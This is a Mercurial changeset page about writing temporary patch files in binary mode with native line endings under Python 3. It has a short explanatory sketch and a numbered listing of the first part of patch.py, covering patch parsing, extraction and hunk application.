py3: wrap file object to write patch in native eol preserving byte-ness
Yuya Nishihara
r36855:472c68cd default
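This changeset replaces two lines (old file lines 1105 and 1109 below): the temporary patch file is no longer created in text mode and opened with os.fdopen(patchfd, r'w'); on Python 3 that would demand unicode strings and perform EOL translation at the wrong layer. Instead the descriptor is opened in binary mode ('wb') and wrapped so that every b'\n' the patch-writing code emits comes out as the platform's native EOL while the data stays bytes throughout. Below is a minimal standalone sketch of such a wrapper; the class name and its always-translate behavior are illustrative assumptions, not Mercurial's actual util.nativeeolwriter (which may be a no-op on platforms whose native EOL is already LF):

import os
import tempfile

class _nativeeolwriter(object):
    # hypothetical stand-in for util.nativeeolwriter: wraps a file
    # object opened in binary mode and rewrites LF to the native EOL
    def __init__(self, fp):
        self._fp = fp

    def write(self, data):
        # normalize CRLF first so b'\r\n' never becomes b'\r\r\n'
        data = data.replace(b'\r\n', b'\n')
        self._fp.write(data.replace(b'\n', os.linesep.encode('ascii')))

    def __getattr__(self, name):
        # delegate close(), flush(), etc. to the wrapped file object
        return getattr(self._fp, name)

# usage mirroring the patched code path: bytes in, native EOLs out
fd, fn = tempfile.mkstemp(prefix='hg-editor-', suffix='.diff')
f = _nativeeolwriter(os.fdopen(fd, 'wb'))
f.write(b'line one\nline two\n')
f.close()
os.unlink(fn)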
@@ -1,2905 +1,2905 @@
1 1 # patch.py - patch file parsing routines
2 2 #
3 3 # Copyright 2006 Brendan Cully <brendan@kublai.com>
4 4 # Copyright 2007 Chris Mason <chris.mason@oracle.com>
5 5 #
6 6 # This software may be used and distributed according to the terms of the
7 7 # GNU General Public License version 2 or any later version.
8 8
9 9 from __future__ import absolute_import, print_function
10 10
11 11 import collections
12 12 import copy
13 13 import difflib
14 14 import email
15 15 import errno
16 16 import hashlib
17 17 import os
18 18 import posixpath
19 19 import re
20 20 import shutil
21 21 import tempfile
22 22 import zlib
23 23
24 24 from .i18n import _
25 25 from .node import (
26 26 hex,
27 27 short,
28 28 )
29 29 from . import (
30 30 copies,
31 31 encoding,
32 32 error,
33 33 mail,
34 34 mdiff,
35 35 pathutil,
36 36 policy,
37 37 pycompat,
38 38 scmutil,
39 39 similar,
40 40 util,
41 41 vfs as vfsmod,
42 42 )
43 43 from .utils import dateutil
44 44
45 45 diffhelpers = policy.importmod(r'diffhelpers')
46 46 stringio = util.stringio
47 47
48 48 gitre = re.compile(br'diff --git a/(.*) b/(.*)')
49 49 tabsplitter = re.compile(br'(\t+|[^\t]+)')
50 50 _nonwordre = re.compile(br'([^a-zA-Z0-9_\x80-\xff])')
51 51
52 52 PatchError = error.PatchError
53 53
54 54 # public functions
55 55
56 56 def split(stream):
57 57 '''return an iterator of individual patches from a stream'''
58 58 def isheader(line, inheader):
59 59 if inheader and line[0] in (' ', '\t'):
60 60 # continuation
61 61 return True
62 62 if line[0] in (' ', '-', '+'):
63 63 # diff line - don't check for header pattern in there
64 64 return False
65 65 l = line.split(': ', 1)
66 66 return len(l) == 2 and ' ' not in l[0]
67 67
68 68 def chunk(lines):
69 69 return stringio(''.join(lines))
70 70
71 71 def hgsplit(stream, cur):
72 72 inheader = True
73 73
74 74 for line in stream:
75 75 if not line.strip():
76 76 inheader = False
77 77 if not inheader and line.startswith('# HG changeset patch'):
78 78 yield chunk(cur)
79 79 cur = []
80 80 inheader = True
81 81
82 82 cur.append(line)
83 83
84 84 if cur:
85 85 yield chunk(cur)
86 86
87 87 def mboxsplit(stream, cur):
88 88 for line in stream:
89 89 if line.startswith('From '):
90 90 for c in split(chunk(cur[1:])):
91 91 yield c
92 92 cur = []
93 93
94 94 cur.append(line)
95 95
96 96 if cur:
97 97 for c in split(chunk(cur[1:])):
98 98 yield c
99 99
100 100 def mimesplit(stream, cur):
101 101 def msgfp(m):
102 102 fp = stringio()
103 103 g = email.Generator.Generator(fp, mangle_from_=False)
104 104 g.flatten(m)
105 105 fp.seek(0)
106 106 return fp
107 107
108 108 for line in stream:
109 109 cur.append(line)
110 110 c = chunk(cur)
111 111
112 112 m = pycompat.emailparser().parse(c)
113 113 if not m.is_multipart():
114 114 yield msgfp(m)
115 115 else:
116 116 ok_types = ('text/plain', 'text/x-diff', 'text/x-patch')
117 117 for part in m.walk():
118 118 ct = part.get_content_type()
119 119 if ct not in ok_types:
120 120 continue
121 121 yield msgfp(part)
122 122
123 123 def headersplit(stream, cur):
124 124 inheader = False
125 125
126 126 for line in stream:
127 127 if not inheader and isheader(line, inheader):
128 128 yield chunk(cur)
129 129 cur = []
130 130 inheader = True
131 131 if inheader and not isheader(line, inheader):
132 132 inheader = False
133 133
134 134 cur.append(line)
135 135
136 136 if cur:
137 137 yield chunk(cur)
138 138
139 139 def remainder(cur):
140 140 yield chunk(cur)
141 141
142 142 class fiter(object):
143 143 def __init__(self, fp):
144 144 self.fp = fp
145 145
146 146 def __iter__(self):
147 147 return self
148 148
149 149 def next(self):
150 150 l = self.fp.readline()
151 151 if not l:
152 152 raise StopIteration
153 153 return l
154 154
155 155 __next__ = next
156 156
157 157 inheader = False
158 158 cur = []
159 159
160 160 mimeheaders = ['content-type']
161 161
162 162 if not util.safehasattr(stream, 'next'):
163 163 # http responses, for example, have readline but not next
164 164 stream = fiter(stream)
165 165
166 166 for line in stream:
167 167 cur.append(line)
168 168 if line.startswith('# HG changeset patch'):
169 169 return hgsplit(stream, cur)
170 170 elif line.startswith('From '):
171 171 return mboxsplit(stream, cur)
172 172 elif isheader(line, inheader):
173 173 inheader = True
174 174 if line.split(':', 1)[0].lower() in mimeheaders:
175 175 # let email parser handle this
176 176 return mimesplit(stream, cur)
177 177 elif line.startswith('--- ') and inheader:
178 178 # No evil headers seen by diff start, split by hand
179 179 return headersplit(stream, cur)
180 180 # Not enough info, keep reading
181 181
182 182 # if we are here, we have a very plain patch
183 183 return remainder(cur)
184 184
185 185 ## Some facility for extensible patch parsing:
186 186 # list of pairs ("header to match", "data key")
187 187 patchheadermap = [('Date', 'date'),
188 188 ('Branch', 'branch'),
189 189 ('Node ID', 'nodeid'),
190 190 ]
191 191
192 192 def extract(ui, fileobj):
193 193 '''extract patch from data read from fileobj.
194 194
195 195 patch can be a normal patch or contained in an email message.
196 196
197 197 return a dictionary. Standard keys are:
198 198 - filename,
199 199 - message,
200 200 - user,
201 201 - date,
202 202 - branch,
203 203 - node,
204 204 - p1,
205 205 - p2.
206 206 Any item can be missing from the dictionary. If filename is missing,
207 207 fileobj did not contain a patch. Caller must unlink filename when done.'''
208 208
209 209 # attempt to detect the start of a patch
210 210 # (this heuristic is borrowed from quilt)
211 211 diffre = re.compile(br'^(?:Index:[ \t]|diff[ \t]-|RCS file: |'
212 212 br'retrieving revision [0-9]+(\.[0-9]+)*$|'
213 213 br'---[ \t].*?^\+\+\+[ \t]|'
214 214 br'\*\*\*[ \t].*?^---[ \t])',
215 215 re.MULTILINE | re.DOTALL)
216 216
217 217 data = {}
218 218 fd, tmpname = tempfile.mkstemp(prefix='hg-patch-')
219 219 tmpfp = os.fdopen(fd, r'wb')
220 220 try:
221 221 msg = pycompat.emailparser().parse(fileobj)
222 222
223 223 subject = msg['Subject'] and mail.headdecode(msg['Subject'])
224 224 data['user'] = msg['From'] and mail.headdecode(msg['From'])
225 225 if not subject and not data['user']:
226 226 # Not an email, restore parsed headers if any
227 227 subject = '\n'.join(': '.join(h) for h in msg.items()) + '\n'
228 228
229 229 # should try to parse msg['Date']
230 230 parents = []
231 231
232 232 if subject:
233 233 if subject.startswith('[PATCH'):
234 234 pend = subject.find(']')
235 235 if pend >= 0:
236 236 subject = subject[pend + 1:].lstrip()
237 237 subject = re.sub(br'\n[ \t]+', ' ', subject)
238 238 ui.debug('Subject: %s\n' % subject)
239 239 if data['user']:
240 240 ui.debug('From: %s\n' % data['user'])
241 241 diffs_seen = 0
242 242 ok_types = ('text/plain', 'text/x-diff', 'text/x-patch')
243 243 message = ''
244 244 for part in msg.walk():
245 245 content_type = pycompat.bytestr(part.get_content_type())
246 246 ui.debug('Content-Type: %s\n' % content_type)
247 247 if content_type not in ok_types:
248 248 continue
249 249 payload = part.get_payload(decode=True)
250 250 m = diffre.search(payload)
251 251 if m:
252 252 hgpatch = False
253 253 hgpatchheader = False
254 254 ignoretext = False
255 255
256 256 ui.debug('found patch at byte %d\n' % m.start(0))
257 257 diffs_seen += 1
258 258 cfp = stringio()
259 259 for line in payload[:m.start(0)].splitlines():
260 260 if line.startswith('# HG changeset patch') and not hgpatch:
261 261 ui.debug('patch generated by hg export\n')
262 262 hgpatch = True
263 263 hgpatchheader = True
264 264 # drop earlier commit message content
265 265 cfp.seek(0)
266 266 cfp.truncate()
267 267 subject = None
268 268 elif hgpatchheader:
269 269 if line.startswith('# User '):
270 270 data['user'] = line[7:]
271 271 ui.debug('From: %s\n' % data['user'])
272 272 elif line.startswith("# Parent "):
273 273 parents.append(line[9:].lstrip())
274 274 elif line.startswith("# "):
275 275 for header, key in patchheadermap:
276 276 prefix = '# %s ' % header
277 277 if line.startswith(prefix):
278 278 data[key] = line[len(prefix):]
279 279 else:
280 280 hgpatchheader = False
281 281 elif line == '---':
282 282 ignoretext = True
283 283 if not hgpatchheader and not ignoretext:
284 284 cfp.write(line)
285 285 cfp.write('\n')
286 286 message = cfp.getvalue()
287 287 if tmpfp:
288 288 tmpfp.write(payload)
289 289 if not payload.endswith('\n'):
290 290 tmpfp.write('\n')
291 291 elif not diffs_seen and message and content_type == 'text/plain':
292 292 message += '\n' + payload
293 293 except: # re-raises
294 294 tmpfp.close()
295 295 os.unlink(tmpname)
296 296 raise
297 297
298 298 if subject and not message.startswith(subject):
299 299 message = '%s\n%s' % (subject, message)
300 300 data['message'] = message
301 301 tmpfp.close()
302 302 if parents:
303 303 data['p1'] = parents.pop(0)
304 304 if parents:
305 305 data['p2'] = parents.pop(0)
306 306
307 307 if diffs_seen:
308 308 data['filename'] = tmpname
309 309 else:
310 310 os.unlink(tmpname)
311 311 return data
312 312
313 313 class patchmeta(object):
314 314 """Patched file metadata
315 315
316 316 'op' is the performed operation, one of ADD, DELETE, RENAME, MODIFY
317 317 or COPY. 'path' is the patched file path. 'oldpath' is set to the
318 318 origin file when 'op' is either COPY or RENAME, None otherwise. If
319 319 file mode is changed, 'mode' is a tuple (islink, isexec) where
320 320 'islink' is True if the file is a symlink and 'isexec' is True if
321 321 the file is executable. Otherwise, 'mode' is None.
322 322 """
323 323 def __init__(self, path):
324 324 self.path = path
325 325 self.oldpath = None
326 326 self.mode = None
327 327 self.op = 'MODIFY'
328 328 self.binary = False
329 329
330 330 def setmode(self, mode):
331 331 islink = mode & 0o20000
332 332 isexec = mode & 0o100
333 333 self.mode = (islink, isexec)
334 334
335 335 def copy(self):
336 336 other = patchmeta(self.path)
337 337 other.oldpath = self.oldpath
338 338 other.mode = self.mode
339 339 other.op = self.op
340 340 other.binary = self.binary
341 341 return other
342 342
343 343 def _ispatchinga(self, afile):
344 344 if afile == '/dev/null':
345 345 return self.op == 'ADD'
346 346 return afile == 'a/' + (self.oldpath or self.path)
347 347
348 348 def _ispatchingb(self, bfile):
349 349 if bfile == '/dev/null':
350 350 return self.op == 'DELETE'
351 351 return bfile == 'b/' + self.path
352 352
353 353 def ispatching(self, afile, bfile):
354 354 return self._ispatchinga(afile) and self._ispatchingb(bfile)
355 355
356 356 def __repr__(self):
357 357 return "<patchmeta %s %r>" % (self.op, self.path)
358 358
359 359 def readgitpatch(lr):
360 360 """extract git-style metadata about patches from <patchname>"""
361 361
362 362 # Filter patch for git information
363 363 gp = None
364 364 gitpatches = []
365 365 for line in lr:
366 366 line = line.rstrip(' \r\n')
367 367 if line.startswith('diff --git a/'):
368 368 m = gitre.match(line)
369 369 if m:
370 370 if gp:
371 371 gitpatches.append(gp)
372 372 dst = m.group(2)
373 373 gp = patchmeta(dst)
374 374 elif gp:
375 375 if line.startswith('--- '):
376 376 gitpatches.append(gp)
377 377 gp = None
378 378 continue
379 379 if line.startswith('rename from '):
380 380 gp.op = 'RENAME'
381 381 gp.oldpath = line[12:]
382 382 elif line.startswith('rename to '):
383 383 gp.path = line[10:]
384 384 elif line.startswith('copy from '):
385 385 gp.op = 'COPY'
386 386 gp.oldpath = line[10:]
387 387 elif line.startswith('copy to '):
388 388 gp.path = line[8:]
389 389 elif line.startswith('deleted file'):
390 390 gp.op = 'DELETE'
391 391 elif line.startswith('new file mode '):
392 392 gp.op = 'ADD'
393 393 gp.setmode(int(line[-6:], 8))
394 394 elif line.startswith('new mode '):
395 395 gp.setmode(int(line[-6:], 8))
396 396 elif line.startswith('GIT binary patch'):
397 397 gp.binary = True
398 398 if gp:
399 399 gitpatches.append(gp)
400 400
401 401 return gitpatches
402 402
403 403 class linereader(object):
404 404 # simple class to allow pushing lines back into the input stream
405 405 def __init__(self, fp):
406 406 self.fp = fp
407 407 self.buf = []
408 408
409 409 def push(self, line):
410 410 if line is not None:
411 411 self.buf.append(line)
412 412
413 413 def readline(self):
414 414 if self.buf:
415 415 l = self.buf[0]
416 416 del self.buf[0]
417 417 return l
418 418 return self.fp.readline()
419 419
420 420 def __iter__(self):
421 421 return iter(self.readline, '')
422 422
423 423 class abstractbackend(object):
424 424 def __init__(self, ui):
425 425 self.ui = ui
426 426
427 427 def getfile(self, fname):
428 428 """Return target file data and flags as a (data, (islink,
429 429 isexec)) tuple. Data is None if file is missing/deleted.
430 430 """
431 431 raise NotImplementedError
432 432
433 433 def setfile(self, fname, data, mode, copysource):
434 434 """Write data to target file fname and set its mode. mode is a
435 435 (islink, isexec) tuple. If data is None, the file content should
436 436 be left unchanged. If the file is modified after being copied,
437 437 copysource is set to the original file name.
438 438 """
439 439 raise NotImplementedError
440 440
441 441 def unlink(self, fname):
442 442 """Unlink target file."""
443 443 raise NotImplementedError
444 444
445 445 def writerej(self, fname, failed, total, lines):
446 446 """Write rejected lines for fname. total is the number of hunks
447 447 which failed to apply and total the total number of hunks for this
448 448 files.
449 449 """
450 450
451 451 def exists(self, fname):
452 452 raise NotImplementedError
453 453
454 454 def close(self):
455 455 raise NotImplementedError
456 456
457 457 class fsbackend(abstractbackend):
458 458 def __init__(self, ui, basedir):
459 459 super(fsbackend, self).__init__(ui)
460 460 self.opener = vfsmod.vfs(basedir)
461 461
462 462 def getfile(self, fname):
463 463 if self.opener.islink(fname):
464 464 return (self.opener.readlink(fname), (True, False))
465 465
466 466 isexec = False
467 467 try:
468 468 isexec = self.opener.lstat(fname).st_mode & 0o100 != 0
469 469 except OSError as e:
470 470 if e.errno != errno.ENOENT:
471 471 raise
472 472 try:
473 473 return (self.opener.read(fname), (False, isexec))
474 474 except IOError as e:
475 475 if e.errno != errno.ENOENT:
476 476 raise
477 477 return None, None
478 478
479 479 def setfile(self, fname, data, mode, copysource):
480 480 islink, isexec = mode
481 481 if data is None:
482 482 self.opener.setflags(fname, islink, isexec)
483 483 return
484 484 if islink:
485 485 self.opener.symlink(data, fname)
486 486 else:
487 487 self.opener.write(fname, data)
488 488 if isexec:
489 489 self.opener.setflags(fname, False, True)
490 490
491 491 def unlink(self, fname):
492 492 self.opener.unlinkpath(fname, ignoremissing=True)
493 493
494 494 def writerej(self, fname, failed, total, lines):
495 495 fname = fname + ".rej"
496 496 self.ui.warn(
497 497 _("%d out of %d hunks FAILED -- saving rejects to file %s\n") %
498 498 (failed, total, fname))
499 499 fp = self.opener(fname, 'w')
500 500 fp.writelines(lines)
501 501 fp.close()
502 502
503 503 def exists(self, fname):
504 504 return self.opener.lexists(fname)
505 505
506 506 class workingbackend(fsbackend):
507 507 def __init__(self, ui, repo, similarity):
508 508 super(workingbackend, self).__init__(ui, repo.root)
509 509 self.repo = repo
510 510 self.similarity = similarity
511 511 self.removed = set()
512 512 self.changed = set()
513 513 self.copied = []
514 514
515 515 def _checkknown(self, fname):
516 516 if self.repo.dirstate[fname] == '?' and self.exists(fname):
517 517 raise PatchError(_('cannot patch %s: file is not tracked') % fname)
518 518
519 519 def setfile(self, fname, data, mode, copysource):
520 520 self._checkknown(fname)
521 521 super(workingbackend, self).setfile(fname, data, mode, copysource)
522 522 if copysource is not None:
523 523 self.copied.append((copysource, fname))
524 524 self.changed.add(fname)
525 525
526 526 def unlink(self, fname):
527 527 self._checkknown(fname)
528 528 super(workingbackend, self).unlink(fname)
529 529 self.removed.add(fname)
530 530 self.changed.add(fname)
531 531
532 532 def close(self):
533 533 wctx = self.repo[None]
534 534 changed = set(self.changed)
535 535 for src, dst in self.copied:
536 536 scmutil.dirstatecopy(self.ui, self.repo, wctx, src, dst)
537 537 if self.removed:
538 538 wctx.forget(sorted(self.removed))
539 539 for f in self.removed:
540 540 if f not in self.repo.dirstate:
541 541 # File was deleted and no longer belongs to the
542 542 # dirstate, it was probably marked added then
543 543 # deleted, and should not be considered by
544 544 # marktouched().
545 545 changed.discard(f)
546 546 if changed:
547 547 scmutil.marktouched(self.repo, changed, self.similarity)
548 548 return sorted(self.changed)
549 549
550 550 class filestore(object):
551 551 def __init__(self, maxsize=None):
552 552 self.opener = None
553 553 self.files = {}
554 554 self.created = 0
555 555 self.maxsize = maxsize
556 556 if self.maxsize is None:
557 557 self.maxsize = 4*(2**20)
558 558 self.size = 0
559 559 self.data = {}
560 560
561 561 def setfile(self, fname, data, mode, copied=None):
562 562 if self.maxsize < 0 or (len(data) + self.size) <= self.maxsize:
563 563 self.data[fname] = (data, mode, copied)
564 564 self.size += len(data)
565 565 else:
566 566 if self.opener is None:
567 567 root = tempfile.mkdtemp(prefix='hg-patch-')
568 568 self.opener = vfsmod.vfs(root)
569 569 # Avoid filename issues with these simple names
570 570 fn = '%d' % self.created
571 571 self.opener.write(fn, data)
572 572 self.created += 1
573 573 self.files[fname] = (fn, mode, copied)
574 574
575 575 def getfile(self, fname):
576 576 if fname in self.data:
577 577 return self.data[fname]
578 578 if not self.opener or fname not in self.files:
579 579 return None, None, None
580 580 fn, mode, copied = self.files[fname]
581 581 return self.opener.read(fn), mode, copied
582 582
583 583 def close(self):
584 584 if self.opener:
585 585 shutil.rmtree(self.opener.base)
586 586
587 587 class repobackend(abstractbackend):
588 588 def __init__(self, ui, repo, ctx, store):
589 589 super(repobackend, self).__init__(ui)
590 590 self.repo = repo
591 591 self.ctx = ctx
592 592 self.store = store
593 593 self.changed = set()
594 594 self.removed = set()
595 595 self.copied = {}
596 596
597 597 def _checkknown(self, fname):
598 598 if fname not in self.ctx:
599 599 raise PatchError(_('cannot patch %s: file is not tracked') % fname)
600 600
601 601 def getfile(self, fname):
602 602 try:
603 603 fctx = self.ctx[fname]
604 604 except error.LookupError:
605 605 return None, None
606 606 flags = fctx.flags()
607 607 return fctx.data(), ('l' in flags, 'x' in flags)
608 608
609 609 def setfile(self, fname, data, mode, copysource):
610 610 if copysource:
611 611 self._checkknown(copysource)
612 612 if data is None:
613 613 data = self.ctx[fname].data()
614 614 self.store.setfile(fname, data, mode, copysource)
615 615 self.changed.add(fname)
616 616 if copysource:
617 617 self.copied[fname] = copysource
618 618
619 619 def unlink(self, fname):
620 620 self._checkknown(fname)
621 621 self.removed.add(fname)
622 622
623 623 def exists(self, fname):
624 624 return fname in self.ctx
625 625
626 626 def close(self):
627 627 return self.changed | self.removed
628 628
629 629 # @@ -start,len +start,len @@ or @@ -start +start @@ if len is 1
630 630 unidesc = re.compile('@@ -(\d+)(?:,(\d+))? \+(\d+)(?:,(\d+))? @@')
631 631 contextdesc = re.compile('(?:---|\*\*\*) (\d+)(?:,(\d+))? (?:---|\*\*\*)')
632 632 eolmodes = ['strict', 'crlf', 'lf', 'auto']
633 633
634 634 class patchfile(object):
635 635 def __init__(self, ui, gp, backend, store, eolmode='strict'):
636 636 self.fname = gp.path
637 637 self.eolmode = eolmode
638 638 self.eol = None
639 639 self.backend = backend
640 640 self.ui = ui
641 641 self.lines = []
642 642 self.exists = False
643 643 self.missing = True
644 644 self.mode = gp.mode
645 645 self.copysource = gp.oldpath
646 646 self.create = gp.op in ('ADD', 'COPY', 'RENAME')
647 647 self.remove = gp.op == 'DELETE'
648 648 if self.copysource is None:
649 649 data, mode = backend.getfile(self.fname)
650 650 else:
651 651 data, mode = store.getfile(self.copysource)[:2]
652 652 if data is not None:
653 653 self.exists = self.copysource is None or backend.exists(self.fname)
654 654 self.missing = False
655 655 if data:
656 656 self.lines = mdiff.splitnewlines(data)
657 657 if self.mode is None:
658 658 self.mode = mode
659 659 if self.lines:
660 660 # Normalize line endings
661 661 if self.lines[0].endswith('\r\n'):
662 662 self.eol = '\r\n'
663 663 elif self.lines[0].endswith('\n'):
664 664 self.eol = '\n'
665 665 if eolmode != 'strict':
666 666 nlines = []
667 667 for l in self.lines:
668 668 if l.endswith('\r\n'):
669 669 l = l[:-2] + '\n'
670 670 nlines.append(l)
671 671 self.lines = nlines
672 672 else:
673 673 if self.create:
674 674 self.missing = False
675 675 if self.mode is None:
676 676 self.mode = (False, False)
677 677 if self.missing:
678 678 self.ui.warn(_("unable to find '%s' for patching\n") % self.fname)
679 679 self.ui.warn(_("(use '--prefix' to apply patch relative to the "
680 680 "current directory)\n"))
681 681
682 682 self.hash = {}
683 683 self.dirty = 0
684 684 self.offset = 0
685 685 self.skew = 0
686 686 self.rej = []
687 687 self.fileprinted = False
688 688 self.printfile(False)
689 689 self.hunks = 0
690 690
691 691 def writelines(self, fname, lines, mode):
692 692 if self.eolmode == 'auto':
693 693 eol = self.eol
694 694 elif self.eolmode == 'crlf':
695 695 eol = '\r\n'
696 696 else:
697 697 eol = '\n'
698 698
699 699 if self.eolmode != 'strict' and eol and eol != '\n':
700 700 rawlines = []
701 701 for l in lines:
702 702 if l and l[-1] == '\n':
703 703 l = l[:-1] + eol
704 704 rawlines.append(l)
705 705 lines = rawlines
706 706
707 707 self.backend.setfile(fname, ''.join(lines), mode, self.copysource)
708 708
709 709 def printfile(self, warn):
710 710 if self.fileprinted:
711 711 return
712 712 if warn or self.ui.verbose:
713 713 self.fileprinted = True
714 714 s = _("patching file %s\n") % self.fname
715 715 if warn:
716 716 self.ui.warn(s)
717 717 else:
718 718 self.ui.note(s)
719 719
720 720
721 721 def findlines(self, l, linenum):
722 722 # looks through the hash and finds candidate lines. The
723 723 # result is a list of line numbers sorted based on distance
724 724 # from linenum
725 725
726 726 cand = self.hash.get(l, [])
727 727 if len(cand) > 1:
728 728 # re-sort our list of potentials forward then back.
729 729 cand.sort(key=lambda x: abs(x - linenum))
730 730 return cand
731 731
732 732 def write_rej(self):
733 733 # our rejects are a little different from patch(1). This always
734 734 # creates rejects in the same form as the original patch. A file
735 735 # header is inserted so that you can run the reject through patch again
736 736 # without having to type the filename.
737 737 if not self.rej:
738 738 return
739 739 base = os.path.basename(self.fname)
740 740 lines = ["--- %s\n+++ %s\n" % (base, base)]
741 741 for x in self.rej:
742 742 for l in x.hunk:
743 743 lines.append(l)
744 744 if l[-1:] != '\n':
745 745 lines.append("\n\ No newline at end of file\n")
746 746 self.backend.writerej(self.fname, len(self.rej), self.hunks, lines)
747 747
748 748 def apply(self, h):
749 749 if not h.complete():
750 750 raise PatchError(_("bad hunk #%d %s (%d %d %d %d)") %
751 751 (h.number, h.desc, len(h.a), h.lena, len(h.b),
752 752 h.lenb))
753 753
754 754 self.hunks += 1
755 755
756 756 if self.missing:
757 757 self.rej.append(h)
758 758 return -1
759 759
760 760 if self.exists and self.create:
761 761 if self.copysource:
762 762 self.ui.warn(_("cannot create %s: destination already "
763 763 "exists\n") % self.fname)
764 764 else:
765 765 self.ui.warn(_("file %s already exists\n") % self.fname)
766 766 self.rej.append(h)
767 767 return -1
768 768
769 769 if isinstance(h, binhunk):
770 770 if self.remove:
771 771 self.backend.unlink(self.fname)
772 772 else:
773 773 l = h.new(self.lines)
774 774 self.lines[:] = l
775 775 self.offset += len(l)
776 776 self.dirty = True
777 777 return 0
778 778
779 779 horig = h
780 780 if (self.eolmode in ('crlf', 'lf')
781 781 or self.eolmode == 'auto' and self.eol):
782 782 # If new eols are going to be normalized, then normalize
783 783 # hunk data before patching. Otherwise, preserve input
784 784 # line-endings.
785 785 h = h.getnormalized()
786 786
787 787 # fast case first, no offsets, no fuzz
788 788 old, oldstart, new, newstart = h.fuzzit(0, False)
789 789 oldstart += self.offset
790 790 orig_start = oldstart
791 791 # if there's skew we want to emit the "(offset %d lines)" even
792 792 # when the hunk cleanly applies at start + skew, so skip the
793 793 # fast case code
794 794 if (self.skew == 0 and
795 795 diffhelpers.testhunk(old, self.lines, oldstart) == 0):
796 796 if self.remove:
797 797 self.backend.unlink(self.fname)
798 798 else:
799 799 self.lines[oldstart:oldstart + len(old)] = new
800 800 self.offset += len(new) - len(old)
801 801 self.dirty = True
802 802 return 0
803 803
804 804 # ok, we couldn't match the hunk. Let's look for offsets and fuzz it
805 805 self.hash = {}
806 806 for x, s in enumerate(self.lines):
807 807 self.hash.setdefault(s, []).append(x)
808 808
809 809 for fuzzlen in xrange(self.ui.configint("patch", "fuzz") + 1):
810 810 for toponly in [True, False]:
811 811 old, oldstart, new, newstart = h.fuzzit(fuzzlen, toponly)
812 812 oldstart = oldstart + self.offset + self.skew
813 813 oldstart = min(oldstart, len(self.lines))
814 814 if old:
815 815 cand = self.findlines(old[0][1:], oldstart)
816 816 else:
817 817 # Only adding lines with no or fuzzed context, just
818 818 # take the skew into account
819 819 cand = [oldstart]
820 820
821 821 for l in cand:
822 822 if not old or diffhelpers.testhunk(old, self.lines, l) == 0:
823 823 self.lines[l : l + len(old)] = new
824 824 self.offset += len(new) - len(old)
825 825 self.skew = l - orig_start
826 826 self.dirty = True
827 827 offset = l - orig_start - fuzzlen
828 828 if fuzzlen:
829 829 msg = _("Hunk #%d succeeded at %d "
830 830 "with fuzz %d "
831 831 "(offset %d lines).\n")
832 832 self.printfile(True)
833 833 self.ui.warn(msg %
834 834 (h.number, l + 1, fuzzlen, offset))
835 835 else:
836 836 msg = _("Hunk #%d succeeded at %d "
837 837 "(offset %d lines).\n")
838 838 self.ui.note(msg % (h.number, l + 1, offset))
839 839 return fuzzlen
840 840 self.printfile(True)
841 841 self.ui.warn(_("Hunk #%d FAILED at %d\n") % (h.number, orig_start))
842 842 self.rej.append(horig)
843 843 return -1
844 844
845 845 def close(self):
846 846 if self.dirty:
847 847 self.writelines(self.fname, self.lines, self.mode)
848 848 self.write_rej()
849 849 return len(self.rej)
850 850
851 851 class header(object):
852 852 """patch header
853 853 """
854 854 diffgit_re = re.compile('diff --git a/(.*) b/(.*)$')
855 855 diff_re = re.compile('diff -r .* (.*)$')
856 856 allhunks_re = re.compile('(?:index|deleted file) ')
857 857 pretty_re = re.compile('(?:new file|deleted file) ')
858 858 special_re = re.compile('(?:index|deleted|copy|rename) ')
859 859 newfile_re = re.compile('(?:new file)')
860 860
861 861 def __init__(self, header):
862 862 self.header = header
863 863 self.hunks = []
864 864
865 865 def binary(self):
866 866 return any(h.startswith('index ') for h in self.header)
867 867
868 868 def pretty(self, fp):
869 869 for h in self.header:
870 870 if h.startswith('index '):
871 871 fp.write(_('this modifies a binary file (all or nothing)\n'))
872 872 break
873 873 if self.pretty_re.match(h):
874 874 fp.write(h)
875 875 if self.binary():
876 876 fp.write(_('this is a binary file\n'))
877 877 break
878 878 if h.startswith('---'):
879 879 fp.write(_('%d hunks, %d lines changed\n') %
880 880 (len(self.hunks),
881 881 sum([max(h.added, h.removed) for h in self.hunks])))
882 882 break
883 883 fp.write(h)
884 884
885 885 def write(self, fp):
886 886 fp.write(''.join(self.header))
887 887
888 888 def allhunks(self):
889 889 return any(self.allhunks_re.match(h) for h in self.header)
890 890
891 891 def files(self):
892 892 match = self.diffgit_re.match(self.header[0])
893 893 if match:
894 894 fromfile, tofile = match.groups()
895 895 if fromfile == tofile:
896 896 return [fromfile]
897 897 return [fromfile, tofile]
898 898 else:
899 899 return self.diff_re.match(self.header[0]).groups()
900 900
901 901 def filename(self):
902 902 return self.files()[-1]
903 903
904 904 def __repr__(self):
905 905 return '<header %s>' % (' '.join(map(repr, self.files())))
906 906
907 907 def isnewfile(self):
908 908 return any(self.newfile_re.match(h) for h in self.header)
909 909
910 910 def special(self):
911 911 # Special files are shown only at the header level and not at the hunk
912 912 # level; for example, a file that has been deleted is a special file.
913 913 # The user cannot change the content of the operation: in the case of
914 914 # a deleted file, the deletion must be taken or left as a whole; it
915 915 # cannot be taken partially.
916 916 # Newly added files are special only if they are empty; they are not
917 917 # special if they have content, as we want that content to be editable.
918 918 nocontent = len(self.header) == 2
919 919 emptynewfile = self.isnewfile() and nocontent
920 920 return emptynewfile or \
921 921 any(self.special_re.match(h) for h in self.header)
922 922
923 923 class recordhunk(object):
924 924 """patch hunk
925 925
926 926 XXX shouldn't we merge this with the other hunk class?
927 927 """
928 928
929 929 def __init__(self, header, fromline, toline, proc, before, hunk, after,
930 930 maxcontext=None):
931 931 def trimcontext(lines, reverse=False):
932 932 if maxcontext is not None:
933 933 delta = len(lines) - maxcontext
934 934 if delta > 0:
935 935 if reverse:
936 936 return delta, lines[delta:]
937 937 else:
938 938 return delta, lines[:maxcontext]
939 939 return 0, lines
940 940
941 941 self.header = header
942 942 trimedbefore, self.before = trimcontext(before, True)
943 943 self.fromline = fromline + trimedbefore
944 944 self.toline = toline + trimedbefore
945 945 _trimedafter, self.after = trimcontext(after, False)
946 946 self.proc = proc
947 947 self.hunk = hunk
948 948 self.added, self.removed = self.countchanges(self.hunk)
949 949
950 950 def __eq__(self, v):
951 951 if not isinstance(v, recordhunk):
952 952 return False
953 953
954 954 return ((v.hunk == self.hunk) and
955 955 (v.proc == self.proc) and
956 956 (self.fromline == v.fromline) and
957 957 (self.header.files() == v.header.files()))
958 958
959 959 def __hash__(self):
960 960 return hash((tuple(self.hunk),
961 961 tuple(self.header.files()),
962 962 self.fromline,
963 963 self.proc))
964 964
965 965 def countchanges(self, hunk):
